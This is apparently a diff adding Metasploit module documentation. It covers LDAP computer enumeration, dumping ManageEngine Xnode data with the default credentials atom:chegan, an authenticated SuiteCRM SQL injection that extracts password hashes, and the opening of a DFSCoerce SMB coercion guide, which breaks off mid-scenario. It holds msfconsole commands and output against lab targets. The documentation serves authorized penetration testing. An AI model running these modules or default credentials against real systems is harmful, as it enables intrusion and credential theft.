+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query             
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_COMPUTERS 
+ACTION => ENUM_COMPUTERS
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.20.161.209
+RHOSTS => 172.20.161.209
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > set OUTPUT_FORMAT csv 
+OUTPUT_FORMAT => csv
+msf6 auxiliary(gather/ldap_query) > show options
+
+Module options (auxiliary/gather/ldap_query):
+
+   Name           Current Setting      Required  Description
+   ----           ---------------      --------  -----------
+   BASE_DN                             no        LDAP base DN if you already have it
+   BIND_DN        normal@daforest.com  no        The username to authenticate to LDAP server
+   BIND_PW        thePassword123       no        Password for the BIND_DN
+   OUTPUT_FORMAT  csv                  yes       The output format to use (Accepted: csv, table, json)
+   RHOSTS         172.20.161.209       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
+                                                 ng-Metasploit
+   RPORT          389                  yes       The target port
+   SSL            false                no        Enable SSL on the LDAP connection
+
+
+Auxiliary action:
+
+   Name            Description
+   ----            -----------
+   ENUM_COMPUTERS  Dump all objects containing an objectCategory of Computer.
+
+
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.20.161.209
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.20.161.209:389 Discovered base DN: DC=daforest,DC=com
+[*] Name,Attributes
+"dn","CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com"
+"distinguishedname","CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com"
+"name","WIN-F7DQC9SR0HD"
+"operatingsystemversion","10.0 (20348)"
+"dnshostname","WIN-F7DQC9SR0HD.daforest.com"
+
+[*] Name,Attributes
+"dn","CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com"
+"description","Created with secframe.com/badblood."
+"distinguishedname","CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com"
+"displayname","FSRWLPT1000000"
+"name","FSRWLPT1000000"
+
+[*] Name,Attributes
+"dn","CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com"
+"description","Created with secframe.com/badblood."
+"distinguishedname","CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com"
+"displayname","TSTWVIR1000000"
+"name","TSTWVIR1000000"
+
+*cut for brevity*
+
+[*] Name,Attributes
+"dn","CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com"
+"description","Created with secframe.com/badblood."
+"distinguishedname","CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com"
+"displayname","WVIR1000013"
+"name","WVIR1000013"
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
+
+### ENUM_COMPUTERS with JSON Output
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/ldap_query             
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_COMPUTERS 
+ACTION => ENUM_COMPUTERS
+msf6 auxiliary(gather/ldap_query) > set RHOSTS 172.20.161.209
+RHOSTS => 172.20.161.209
+msf6 auxiliary(gather/ldap_query) > set BIND_PW thePassword123
+BIND_PW => thePassword123
+msf6 auxiliary(gather/ldap_query) > set BIND_DN normal@daforest.com
+BIND_DN => normal@daforest.com
+msf6 auxiliary(gather/ldap_query) > set OUTPUT_FORMAT json 
+OUTPUT_FORMAT => json
+msf6 auxiliary(gather/ldap_query) > show options
+
+Module options (auxiliary/gather/ldap_query):
+
+   Name           Current Setting      Required  Description
+   ----           ---------------      --------  -----------
+   BASE_DN                             no        LDAP base DN if you already have it
+   BIND_DN        normal@daforest.com  no        The username to authenticate to LDAP server
+   BIND_PW        thePassword123       no        Password for the BIND_DN
+   OUTPUT_FORMAT  json                 yes       The output format to use (Accepted: csv, table, json)
+   RHOSTS         172.20.161.209       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
+                                                 ng-Metasploit
+   RPORT          389                  yes       The target port
+   SSL            false                no        Enable SSL on the LDAP connection
+
+
+Auxiliary action:
+
+   Name            Description
+   ----            -----------
+   ENUM_COMPUTERS  Dump all objects containing an objectCategory of Computer.
+
+
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 172.20.161.209
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 172.20.161.209:389 Discovered base DN: DC=daforest,DC=com
+[*] CN=WIN-F7DQC9SR0HD OU=Domain Controllers DC=daforest DC=com
+{
+  "dn": "CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com",
+  "distinguishedname": "CN=WIN-F7DQC9SR0HD,OU=Domain Controllers,DC=daforest,DC=com",
+  "name": "WIN-F7DQC9SR0HD",
+  "operatingsystemversion": "10.0 (20348)",
+  "dnshostname": "WIN-F7DQC9SR0HD.daforest.com"
+}
+[*] CN=FSRWLPT1000000 OU=Testing DC=daforest DC=com
+{
+  "dn": "CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=FSRWLPT1000000,OU=Testing,DC=daforest,DC=com",
+  "displayname": "FSRWLPT1000000",
+  "name": "FSRWLPT1000000"
+}
+[*] CN=TSTWVIR1000000 OU=FSR OU=People DC=daforest DC=com
+{
+  "dn": "CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=TSTWVIR1000000,OU=FSR,OU=People,DC=daforest,DC=com",
+  "displayname": "TSTWVIR1000000",
+  "name": "TSTWVIR1000000"
+}
+*cut for brevity*
+[*] CN=WLPT1000014 OU=AZR OU=Stage DC=daforest DC=com
+{
+  "dn": "CN=WLPT1000014,OU=AZR,OU=Stage,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=WLPT1000014,OU=AZR,OU=Stage,DC=daforest,DC=com",
+  "displayname": "WLPT1000014",
+  "name": "WLPT1000014"
+}
+[*] CN=WWKS1000016 OU=T1-Roles OU=Tier 1 OU=Admin DC=daforest DC=com
+{
+  "dn": "CN=WWKS1000016,OU=T1-Roles,OU=Tier 1,OU=Admin,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=WWKS1000016,OU=T1-Roles,OU=Tier 1,OU=Admin,DC=daforest,DC=com",
+  "displayname": "WWKS1000016",
+  "name": "WWKS1000016"
+}
+[*] CN=WVIR1000013 OU=Test OU=BDE OU=Tier 2 DC=daforest DC=com
+{
+  "dn": "CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com",
+  "description": "Created with secframe.com/badblood.",
+  "distinguishedname": "CN=WVIR1000013,OU=Test,OU=BDE,OU=Tier 2,DC=daforest,DC=com",
+  "displayname": "WVIR1000013",
+  "name": "WVIR1000013"
+}
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) > 
+```
@@ -0,0 +1,156 @@
+## Vulnerable Application
+The module exploits default admin credentials for the DataEngine Xnode server in ADAudit Plus versions prior to 6.0.3 (6032)
+in order to dump the contents of Xnode data repositories (tables), which may contain varying amounts of Active Directory information
+including domain names, host names, usernames and SIDs. The module can also be used against patched ADAudit Plus
+versions if the correct credentials are provided.
+
+The module's `check` method attempts to authenticate to the remote Xnode server. The default credentials are `atom`:`chegan`.
+If the credentials are valid, the module will perform a few requests to the Xnode server to obtain information like the Xnode version.
+This is mostly done as a sanity check to ensure the Xnode server is working as expected.
+
+Next, the module will iterate over a list of known Xnode data repositories and perform several requests for each in order to:
+- Check if the data repository is configured on the target
+- Obtain the total number of records in the data repository
+- Obtain both the lowest and the highest value for the ID field (column). These values will be used
+to determine the range of possible records to be queried.
+
+If a given data repository exists, the module uses the above information to dump the data repository contents.
+The maximum number of records returned for a search query is 10. To overcome this, the module performs series of requests
+using the `dr:/dr_search` action, while specifying the ID values for each record.
+For example, if the lowest observed ID value is 15 and the highest is 41, the module will perform three requests:
+1. A request for the records with ID values 15 to 24
+2. A request for the records with ID values 25 to 34
+3. A request for the records with ID values 35 to 41
+Empty records are ignored.
+
+To view the raw Xnode requests and responses, enter `set VERBOSE true` before running the module.
+
+By default, the module dumps only the data repositories (tables) and fields (columns) specified in the configuration file.
+The configuration file can be set via the `CONFIG_FILE` option, but this is not required because
+a default config file exists at `data/exploits/manageengine_xnode/CVE-2020-11532/adaudit_plus_xnode_conf.yaml` that will
+be used if `CONFIG_FILE` is not set.
+
+The configuration file is also used to add labels to the values sent by Xnode in response to a query.
+This means that for every value in the Xnode response, the module will add the corresponding field name to the results
+before writing those to a JSON file in `~/.msf4/loot`.
+
+It is also possible to use the `DUMP_ALL` option to obtain all data in all known data repositories without specifying data field names.
+However, note that when using this option the data won't be labeled.
+
+This module has been successfully tested against ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2
+and ADAudit Plus 6.0.7 (6076) running on Windows Server 2019.
+
+## Installation Information
+Vulnerable versions of ADAudit Plus are available [here](https://archives2.manageengine.com/active-directory-audit/).
+All versions from 6000 through 6031 are configured with default Xnode credentials. Note that testing against
+vulnerable versions from the archives will make data enumeration impossible because the free trials for those
+versions do not seem to allow ADAudit Plus to actually start collecting data that can then be accessed via Xnode.
+
+However, apart from some configuration changes, Xnode functions the same way on patched versions as it does on vulnerable versions,
+so it is possible to test the modules against patched versions as long as the correct credentials are provided.
+
+A free 30-day trial of the latest version of ADAudit Plus can be downloaded
+[here](https://www.manageengine.com/products/active-directory-audit/download.html). To install, just run the .exe and follow the instructions.
+
+In order to configure a patched ManageEngine ADAudit Plus instance for testing, follow these steps:
+- Open the Xnode config file at `<install_dir>\apps\dataengine-xnode\conf\dataengine-xnode.conf`
+- Note down the username and password
+- Insert the following line:
+```
+xnode.connector.accept_remote_request = true
+```
+To launch ADAudit Plus, run Command Prompt as administrator and run: `<install_dir>\bin\run.bat`
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/gather/manageengine_adaudit_plus_xnode_enum`
+3. Do: `set RHOSTS [IP]`
+4. Do: `run`
+
+## Options
+### CONFIG_FILE
+YAML File specifying the data repositories (tables) and fields (columns) to dump.
+
+### DUMP_ALL
+Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+
+## Scenarios
+### ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2
+```
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > options
+
+Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):
+
+   Name         Current Setting                                                Required  Description
+   ----         ---------------                                                --------  -----------
+   CONFIG_FILE  /home/wynter/dev/metasploit-framework/data/exploits/manageeng  no        YAML file specifying the data repositories (tables) and fields (columns) to dump
+                ine_xnode/CVE-2020-11532/adaudit_plus_xnode_conf.yaml
+   DUMP_ALL     false                                                          no        Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+   PASSWORD     chegan                                                         yes       Password used to authenticate to the Xnode server
+   RHOSTS       192.168.1.41                                                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT        29118                                                          yes       The target port (TCP)
+   USERNAME     atom                                                           yes       Username used to authenticate to the Xnode server
+
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > run
+[*] Running module against 192.168.1.41
+
+[*] 192.168.1.41:29118 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.1.41:29118 - Target seems to be Xnode.
+[+] 192.168.1.41:29118 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
+[*] 192.168.1.41:29118 - Obtained expected Xnode "de_healh" status: "GREEN".
+[*] 192.168.1.41:29118 - Target is running Xnode version: "XNODE_1_0_0".
+[*] 192.168.1.41:29118 - Obtained Xnode installation path: "C:\Program Files (x86)\ManageEngine\ADAudit Plus\apps\dataengine-xnode".
+[*] 192.168.1.41:29118 - Data repository AdapFileAuditLog is empty.
+[*] 192.168.1.41:29118 - The data repository AdapPowershellAuditLog is not available on the target.
+[*] 192.168.1.41:29118 - The data repository AdapSysMonAuditLog is not available on the target.
+[*] 192.168.1.41:29118 - The data repository AdapDNSAuditLog is not available on the target.
+[*] 192.168.1.41:29118 - The data repository AdapADReplicationAuditLog is not available on the target.
+[*] Auxiliary module execution completed
+```
+
+### ManageEngine ADAudit Plus 6.0.7 (6076) running on Windows Server 2019 (custom password)
+```
+msf6 > use auxiliary/gather/manageengine_adaudit_plus_xnode_enum
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > set rhosts 192.168.1.25
+rhosts => 192.168.1.25
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > set password custom_password
+password => custom_password
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > options 
+
+Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):
+
+   Name         Current Setting                                                                                                 Required  Description
+   ----         ---------------                                                                                                 --------  -----------
+   CONFIG_FILE  /root/github/manageengine/metasploit-framework/data/exploits/manageengine_xnode/CVE-2020-11532/adaudit_plus_xn  no        YAML file specifying the data repositories (tables) and fields (columns) to dump
+                ode_conf.yaml
+   DUMP_ALL     false                                                                                                           no        Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+   PASSWORD     custom_password                                                                                                 yes       Password used to authenticate to the Xnode server
+   RHOSTS       192.168.1.25                                                                                                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT        29118                                                                                                           yes       The target port (TCP)
+   USERNAME     atom                                                                                                            yes       Username used to authenticate to the Xnode server
+
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > run
+
+[*] Running module against 192.168.1.25
+
+[*] 192.168.1.25:29118 - Running automatic check ("set AutoCheck false" to disable)
+[+] 192.168.1.25:29118 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
+[*] 192.168.1.25:29118 - Obtained expected Xnode "de_healh" status: "GREEN".
+[*] 192.168.1.25:29118 - Target is running Xnode version: "DataEngine-XNode 1.1.0 (1100)".
+[*] 192.168.1.25:29118 - Obtained Xnode installation path: "C:\Program Files\ManageEngine\ADAudit Plus\apps\dataengine-xnode".
+[*] 192.168.1.25:29118 - Data repository AdapFileAuditLog is empty.
+[+] 192.168.1.25:29118 - Data repository AdapPowershellAuditLog contains 261 records with ID numbers between 1.0 and 303.0.
+[*] 192.168.1.25:29118 - Data repository AdapSysMonAuditLog is empty.
+[+] 192.168.1.25:29118 - Data repository AdapDNSAuditLog contains 722 records with ID numbers between 1.0 and 926.0.
+[*] 192.168.1.25:29118 - Data repository AdapADReplicationAuditLog is empty.
+[*] 192.168.1.25:29118 - Attempting to request 261 records for data repository AdapPowershellAuditLog between IDs 1 and 303. This could take a while...
+[*] 192.168.1.25:29118 - Processed 25 queries (max 10 records per query) so far. The last queried record ID was 250. The max ID is 303...
+[+] 192.168.1.25:29118 - Saving 261 records from the AdapPowershellAuditLog data repository to /root/.msf4/loot/20220610073738_default_192.168.1.25_xnode_powershell_099421.json
+[*] 192.168.1.25:29118 - Attempting to request 722 records for data repository AdapDNSAuditLog between IDs 1 and 926. This could take a while...
+[*] 192.168.1.25:29118 - Processed 25 queries (max 10 records per query) so far. The last queried record ID was 250. The max ID is 926...
+[*] 192.168.1.25:29118 - Processed 50 queries (max 10 records per query) so far. The last queried record ID was 500. The max ID is 926...
+[*] 192.168.1.25:29118 - Processed 75 queries (max 10 records per query) so far. The last queried record ID was 750. The max ID is 926...
+[+] 192.168.1.25:29118 - Saving 722 records from the AdapDNSAuditLog data repository to /root/.msf4/loot/20220610073754_default_192.168.1.25_xnode_dnsaudit_775121.json
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) >
+```
@@ -0,0 +1,114 @@
+## Vulnerable Application
+The module exploits default admin credentials for the DataEngine Xnode server in DataSecurity Plus versions prior to 6.0.1 (6011)
+in order to dump the contents of Xnode data repositories (tables), which may contain varying amounts of Active Directory information
+including domain names, host names, usernames and SIDs. The module can also be used against patched 
+DataSecurity Plus versions if the correct credentials are provided.
+
+The module's `check` method attempts to authenticate to the remote Xnode server. The default credentials are `atom`:`chegan`.
+If the credentials are valid, the module will perform a few requests to the Xnode server to obtain information like the Xnode version.
+This is mostly done as a sanity check to ensure the Xnode server is working as expected.
+
+Next, the module will iterate over a list of known Xnode data repositories and perform several requests for each in order to:
+- Check if the data repository is configured on the target
+- Obtain the total number of records in the data repository
+- Obtain both the lowest and the highest value for the ID field (column). These values will be used
+to determine the range of possible records to be queried.
+
+If a given data repository exists, the module uses the above information to dump the data repository contents.
+The maximum number of records returned for a search query is 10. To overcome this, the module performs series of requests
+using the `dr:/dr_search` action, while specifying the ID values for each record.
+For example, if the lowest observed ID value is 15 and the highest is 41, the module will perform three requests:
+1. A request for the records with ID values 15 to 24
+2. A request for the records with ID values 25 to 34
+3. A request for the records with ID values 35 to 41
+Empty records are ignored.
+
+To view the raw Xnode requests and responses, enter `set VERBOSE true` before running the module.
+
+By default, the module dumps only the data repositories (tables) and fields (columns) specified in the configuration file.
+The configuration file can be set via the `CONFIG_FILE` option, but this is not required because
+a default config file exists at `data/exploits/manageengine_xnode/CVE-2020-11532/datasecurity_plus_xnode_conf.yaml`
+that will be used if `CONFIG_FILE` is not set.
+
+The configuration file is then also used to add labels to the values sent by Xnode in response to a query.
+This means that for every value in the Xnode response, the module will add the corresponding field name to the results
+before writing those to a JSON file in `~/.msf4/loot`.
+
+It is also possible to use the `DUMP_ALL` option to obtain all data in all known data repositories without specifying data field names.
+However, note when using this option the data won't be labeled.
+
+This module has been successfully tested against DataSecurity Plus 6.0.1 (6010) running on Windows Server 2012 R2.
+
+## Installation Information
+Vulnerable versions of DataSecurity Plus are available [here](https://archives.manageengine.com/data-security/).
+All versions from 6000 through 6011 are configured with default Xnode credentials. Note that testing against
+vulnerable versions from the archives will make data enumeration impossible because the free trials for those
+versions do not seem to allow ADAudit Plus to actually start collecting data that can then be accessed via Xnode.
+
+However, apart from some configuration changes, Xnode functions the same way on patched versions as it does on vulnerable versions,
+so it is possible to test the modules against patched versions as long as the correct credentials are provided.
+
+A free 30-day trial of DataSecurity Plus can be downloaded [here](https://www.manageengine.com/data-security/download.html).
+To install, just run the .exe and follow the instructions.
+
+In order to configure a patched ManageEngine DataSecurity Plus instance for testing, follow these steps:
+- Open the Xnode config file at `<install_dir>\apps\dataengine-xnode\conf\dataengine-xnode.conf`
+- Note down the username and password
+- Insert the following line:
+```
+xnode.connector.accept_remote_request = true
+```
+To launch DataSecurity Plus, run Command Prompt as administrator and run: `<install_dir>\bin\run.bat`
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/gather/manageengine_datasecurity_plus_xnode_enum`
+3. Do: `set RHOSTS [IP]`
+4. Do: `run`
+
+## Options
+### CONFIG_FILE
+YAML File specifying the data repositories (tables) and fields (columns) to dump.
+
+### DUMP_ALL
+Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+
+## Scenarios
+### ManageEngine DataSecurity Plus 6.0.1 (6010) on Windows Server 2012
+```
+msf6 auxiliary(gather/manageengine_datasecurity_plus_xnode_enum) > options 
+
+Module options (auxiliary/gather/manageengine_datasecurity_plus_xnode_enum):
+
+   Name         Current Setting                                                Required  Description
+   ----         ---------------                                                --------  -----------
+   CONFIG_FILE  /home/wynter/dev/metasploit-framework/data/exploits/manageeng  no        YAML file specifying the data repositories (tables) and fields (columns) to dump
+                ine_xnode/CVE-2020-11532/datasecurity_plus_xnode_conf.yaml
+   DUMP_ALL     false                                                          no        Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
+   PASSWORD     chegan                                                         yes       Password used to authenticate to the Xnode server
+   RHOSTS       192.168.1.41                                                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT        29119                                                          yes       The target port (TCP)
+   USERNAME     atom                                                           yes       Username used to authenticate to the Xnode server
+
+msf6 auxiliary(gather/manageengine_datasecurity_plus_xnode_enum) > run
+[*] Running module against 192.168.1.41
+
+[*] 192.168.1.41:29119 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.1.41:29119 - Target seems to be Xnode.
+[+] 192.168.1.41:29119 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
+[*] 192.168.1.41:29119 - Obtained expected Xnode "de_healh" status: "GREEN".
+[*] 192.168.1.41:29119 - Target is running Xnode version: "XNODE_1_0_0".
+[*] 192.168.1.41:29119 - Obtained Xnode installation path: "C:\Program Files (x86)\ManageEngine\DataSecurity Plus\apps\dataengine-xnode".
+[*] 192.168.1.41:29119 - Data repository DSPEmailAuditAttachments is empty.
+[*] 192.168.1.41:29119 - Data repository DSPEmailAuditReport is empty.
+[*] 192.168.1.41:29119 - Data repository DSPEndpointAuditReport is empty.
+[*] 192.168.1.41:29119 - Data repository DSPEndpointClassificationReport is empty.
+[*] 192.168.1.41:29119 - Data repository DSPEndpointIncidentReport is empty.
+[*] 192.168.1.41:29119 - Data repository DspEndpointPrinterAuditReport is empty.
+[*] 192.168.1.41:29119 - Data repository DspEndpointWebAuditReport is empty.
+[*] 192.168.1.41:29119 - Data repository DSPFileAnalysisAlerts is empty.
+[*] 192.168.1.41:29119 - Data repository RAAlertHistory is empty.
+[*] 192.168.1.41:29119 - Data repository RAIncidents is empty.
+[*] 192.168.1.41:29119 - Data repository RAViolationRecords is empty.
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,195 @@
+## Description
+This module exploits an authenticated SQL injection in SuiteCRM installations below or equal to version 7.12.5. The 
+vulnerability allows for union and blind boolean based SQLi to be exploited in order to collect usernames and password 
+hashes from the SuiteCRM database.
+
+## Vulnerable Application
+
+The SQLi exploited by this module depends on the existence of at least one 'Account' being registered in SuiteCRM.
+There should be one in SuiteCRM by default for the administrative user. If you want to test multiple users,
+browse to `/index.php?module=Users&action=index` and then click the `Create New User` button on the left side
+of the screen. Then enter a username and a last name. Then click the `password` tab, and enter a password for
+the user, then confirm this password and click the `Save` button to create the user.
+
+### Docker compose
+
+**Prerequisites:** [Docker](https://docs.docker.com/get-docker/) and
+[Docker Compose](https://docs.docker.com/compose/install/) must be
+installed first.
+
+To create a SuiteCRM 7.12.5 Docker container, first create a new folder, 
+then save the following content as `docker-compose.yml`:
+
+```
+version: '2'
+services:
+  mariadb:
+    image: docker.io/bitnami/mariadb:10.6
+    environment:
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+      - MARIADB_USER=bn_suitecrm
+      - MARIADB_DATABASE=bitnami_suitecrm
+      - MARIADB_PASSWORD=bitnami123
+    volumes:
+      - 'mariadb_data:/bitnami/mariadb'
+  suitecrm:
+    image: docker.io/bitnami/suitecrm:7.12.5
+    ports:
+      - '80:8080'
+      - '443:8443'
+    environment:
+      - SUITECRM_DATABASE_HOST=mariadb
+      - SUITECRM_DATABASE_PORT_NUMBER=3306
+      - SUITECRM_DATABASE_USER=bn_suitecrm
+      - SUITECRM_DATABASE_NAME=bitnami_suitecrm
+      - SUITECRM_DATABASE_PASSWORD=bitnami123
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+    volumes:
+      - 'suitecrm_data:/bitnami/suitecrm'
+    depends_on:
+      - mariadb
+volumes:
+  mariadb_data:
+    driver: local
+  suitecrm_data:
+    driver: local 
+```
+
+Finally, in the same directory as the `docker-compose.yml` file, run: `docker-compose up -d`.
+
+Note that the default username to log in will be `user` and the password will be `bitnami`. If you
+want to change these, put the following lines under the `environment` section:
+
+```
+    environment:
+      - SUITECRM_USERNAME=my_user
+      - SUITECRM_PASSWORD=my_password
+```
+
+The above would set the username to `my_user` and the password to `my_password`.
+
+For more information on the docker compose file, refer to
+https://github.com/bitnami/containers/tree/main/bitnami/suitecrm.
+
+### Install from source
+
+Source code can be found here: [SuiteCRM v7.12.5](https://github.com/salesagility/SuiteCRM/archive/refs/tags/v7.12.5.tar.gz) 
+
+Instructions on installing from source can be found here: [Installation Guide](https://docs.suitecrm.com/admin/installation-guide/downloading-installing/) 
+
+The following setup was installed on Ubuntu 20.04:
+
+1. Setup and install MySQL:
+    1. `sudo apt update`
+    1. `sudo apt install mysql-server`
+    1. `sudo systemctl start mysql.service`
+    1. `sudo mysql` (open the mysql prompt)
+    1. `mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';` (change the password 
+       of the root user)
+       
+1. Install Apache
+    1. `sudo apt install apache2`
+    1. `sudo systemctl enable apache2`
+    1. `sudo systemctl start apache2`
+       
+1. Install php and its dependencies
+    1. `sudo apt -y install php7.4`
+    1. `sudo apt install -y php-cli php-common php-curl php-mbstring php-gd php-mysql php-soap php-xml php-imap php-intl php-opcache php-json php-zip`
+    1. `sudo apt install composer`
+    1. `composer install`
+    
+1. Setup and install SuiteCRM 7.12.5
+    1. `wget https://github.com/salesagility/SuiteCRM/archive/refs/tags/v7.12.5.tar.gz`
+    1. `gunzip v7.12.5.tar.gz`
+    1. `tar -xvf v7.12.5.tar`
+    1. `sudo cp -r SuiteCRM-7.12.5/. /var/www/html`
+    1. `cd /var/www/html`
+    1. `sudo chown -R www-data:www-data .`
+    1. `sudo chmod -R 755 .`
+    1. `sudo chmod -R 775 custom modules themes data upload`
+    1. `sudo chmod 775 config_override.php 2>/dev/null`
+    1. Navigate to http://localhost/install.php and follow the installation wizard to complete the install
+    
+
+## Verification Steps
+
+1. Start up metasploit
+1. Do: `use auxiliary/gather/suite_crm_export_sqli`
+1. Do: `set RHOSTS [IP]`
+1. Configure a user and password by setting `USERNAME` and `PASSWORD`.
+1. Do: `run`
+
+## Scenarios
+
+### SuiteCRM 7.12.5 Bitnami Docker Image
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/suite_crm_export_sqli 
+msf6 auxiliary(gather/suite_crm_export_sqli) > show options
+
+Module options (auxiliary/gather/suite_crm_export_sqli):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   COUNT     3                no        Number of users to enumerate
+   PASSWORD                   yes       Password for user
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasp
+                                        loit
+   RPORT     80               yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   USERNAME                   yes       Username of user
+   VHOST                      no        HTTP server virtual host
+
+
+Auxiliary action:
+
+   Name              Description
+   ----              -----------
+   Dump credentials  Dumps usernames and passwords from the users table
+
+
+msf6 auxiliary(gather/suite_crm_export_sqli) > set USERNAME user
+USERNAME => user
+msf6 auxiliary(gather/suite_crm_export_sqli) > set PASSWORD bitnami
+PASSWORD => bitnami
+msf6 auxiliary(gather/suite_crm_export_sqli) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/suite_crm_export_sqli) > check
+
+[*] Authenticating as user
+[+] Authenticated as: user
+[*] Version detected: 7.12.5
+[+] 127.0.0.1:80 - The target is vulnerable.
+msf6 auxiliary(gather/suite_crm_export_sqli) > run
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Authenticating as user
+[+] Authenticated as: user
+[*] Version detected: 7.12.5
+[+] The target is vulnerable.
+[*] Fetching Users, please wait...
+SuiteCRM User Names
+===================
+
+ Username
+ --------
+ testuser
+ user
+
+[*] Fetching Hashes, please wait...
+[+] (1/2) Username : testuser ; Hash : $2y$10$YFr9.QNPVDXoLKv5FQo7d.UIRBSMTnPGDS2LLHsuGSojAA2Q5kELa
+[+] (2/2) Username : user ; Hash : $2y$10$O83wcCVEfY7GKo//dbQwwOFOevfLFnhpP4d9n98HmGM2YPxJZqMhO
+SuiteCRM User Credentials
+=========================
+
+ Username  Hash
+ --------  ----
+ testuser  $2y$10$YFr9.QNPVDXoLKv5FQo7d.UIRBSMTnPGDS2LLHsuGSojAA2Q5kELa
+ user      $2y$10$O83wcCVEfY7GKo//dbQwwOFOevfLFnhpP4d9n98HmGM2YPxJZqMhO
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/suite_crm_export_sqli) > 
+```
@@ -0,0 +1,62 @@
+## Vulnerable Application
+
+Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/dcerpc/dfscoerce`
+4. Set the `RHOSTS` and `LISTENER` options
+5. Set the `SMBUser`, `SMBPass` for authentication
+6. (Optional) Set the `METHOD` options to adjust the trigger vector
+7. Do: `run`
+
+## Options
+
+### LISTENER
+The host listening for the incoming connection. The target will authenticate to this host using SMB. The listener host
+should be hosting some kind of capture or relaying service.
+
+### METHOD
+The RPC method to use for triggering.
+
+## Scenarios
+
+### Windows Server 2019
+In this case, Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine
+account. The target is a 64-bit Windows Server 2019 domain controller.
+
+```
+msf6 > use auxiliary/server/capture/smb 
+msf6 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 0.
+msf6 auxiliary(server/capture/smb) > 
+[*] Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+
